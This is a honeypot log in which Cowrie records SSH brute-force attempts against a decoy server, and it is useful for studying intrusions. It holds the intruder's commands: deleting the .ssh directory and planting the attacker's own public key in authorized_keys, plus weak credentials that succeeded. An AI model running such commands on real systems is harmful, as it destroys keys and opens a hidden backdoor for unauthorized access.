{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54092,"dst_ip":"1.2.3.4","dst_port":22,"session":"122eda6dba19","protocol":"ssh","message":"New connection: 212.227.235.229:54092 (1.2.3.4:22) [session: 122eda6dba19]","sensor":"my-vps","timestamp":"2025-08-26T03:36:52.181492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:36:52.183025Z","src_ip":"212.227.235.229","session":"122eda6dba19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:36:54.188272Z","src_ip":"212.227.235.229","session":"122eda6dba19"}
{"eventid":"cowrie.login.failed","username":"space","password":"space","message":"login attempt [space/space] failed","sensor":"my-vps","timestamp":"2025-08-26T03:36:54.937949Z","src_ip":"212.227.235.229","session":"122eda6dba19"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:36:56.190836Z","src_ip":"212.227.235.229","session":"122eda6dba19"}
{"eventid":"cowrie.session.closed","duration":"305.4","message":"Connection lost after 305.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:37:18.339887Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:37:28.578089Z","src_ip":"212.227.235.229","session":"ee578d22a066"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55316,"dst_ip":"1.2.3.4","dst_port":22,"session":"a822696170db","protocol":"ssh","message":"New connection: 217.72.205.35:55316 (1.2.3.4:22) [session: a822696170db]","sensor":"my-vps","timestamp":"2025-08-26T03:37:48.398710Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:37:48.399807Z","src_ip":"217.72.205.35","session":"a822696170db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53080,"dst_ip":"1.2.3.4","dst_port":22,"session":"34c21e5f44fb","protocol":"ssh","message":"New connection: 212.227.235.229:53080 (1.2.3.4:22) [session: 34c21e5f44fb]","sensor":"my-vps","timestamp":"2025-08-26T03:38:15.498283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:38:15.499208Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:38:15.748502Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwe123321","message":"login attempt [root/Qwe123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:38:16.781476Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:38:17.291732Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:38:17.292400Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:38:17.293498Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:38:17.542580Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:38:18.164103Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:38:18.164782Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:38:18.414918Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:38:18.415746Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43446,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf3e30fbe083","protocol":"ssh","message":"New connection: 212.227.235.229:43446 (1.2.3.4:22) [session: bf3e30fbe083]","sensor":"my-vps","timestamp":"2025-08-26T03:38:18.659003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:38:18.659766Z","src_ip":"212.227.235.229","session":"bf3e30fbe083"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:38:19.876736Z","src_ip":"212.227.235.229","session":"bf3e30fbe083"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:38:20.620042Z","src_ip":"212.227.235.229","session":"bf3e30fbe083"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:38:21.870028Z","src_ip":"212.227.235.229","session":"bf3e30fbe083"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43458,"dst_ip":"1.2.3.4","dst_port":22,"session":"894d007cc9f9","protocol":"ssh","message":"New connection: 212.227.235.229:43458 (1.2.3.4:22) [session: 894d007cc9f9]","sensor":"my-vps","timestamp":"2025-08-26T03:38:22.119414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:38:22.120183Z","src_ip":"212.227.235.229","session":"894d007cc9f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:38:23.333035Z","src_ip":"212.227.235.229","session":"894d007cc9f9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:38:24.080676Z","src_ip":"212.227.235.229","session":"894d007cc9f9"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:38:24.330642Z","src_ip":"212.227.235.229","session":"34c21e5f44fb"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:38:24.332040Z","src_ip":"212.227.235.229","session":"894d007cc9f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38674,"dst_ip":"1.2.3.4","dst_port":22,"session":"987a9afc6916","protocol":"ssh","message":"New connection: 212.227.235.229:38674 (1.2.3.4:22) [session: 987a9afc6916]","sensor":"my-vps","timestamp":"2025-08-26T03:39:27.359603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:39:27.923337Z","src_ip":"212.227.235.229","session":"987a9afc6916"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:39:27.924501Z","src_ip":"212.227.235.229","session":"987a9afc6916"}
{"eventid":"cowrie.login.success","username":"root","password":"123QWE!@#","message":"login attempt [root/123QWE!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:39:30.962051Z","src_ip":"212.227.235.229","session":"987a9afc6916"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:39:31.905705Z","src_ip":"212.227.235.229","session":"987a9afc6916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42698,"dst_ip":"1.2.3.4","dst_port":22,"session":"12f2ecb82382","protocol":"ssh","message":"New connection: 212.227.235.229:42698 (1.2.3.4:22) [session: 12f2ecb82382]","sensor":"my-vps","timestamp":"2025-08-26T03:39:38.174581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:39:38.175340Z","src_ip":"212.227.235.229","session":"12f2ecb82382"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:39:38.429251Z","src_ip":"212.227.235.229","session":"12f2ecb82382"}
{"eventid":"cowrie.login.failed","username":"es","password":"1234qwer","message":"login attempt [es/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T03:39:39.485339Z","src_ip":"212.227.235.229","session":"12f2ecb82382"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:39:40.743609Z","src_ip":"212.227.235.229","session":"12f2ecb82382"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43498,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c2e05bf22ba","protocol":"ssh","message":"New connection: 212.227.235.229:43498 (1.2.3.4:22) [session: 1c2e05bf22ba]","sensor":"my-vps","timestamp":"2025-08-26T03:41:03.171392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:41:03.172228Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:41:04.386163Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789010","message":"login attempt [root/123456789010] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:41:05.739083Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:41:06.303877Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:41:06.304735Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:41:06.305735Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:41:07.330307Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:41:08.645241Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:41:08.646140Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:41:08.896656Z","src_ip":"212.227.235.229","session":"1c2e05bf22ba"}
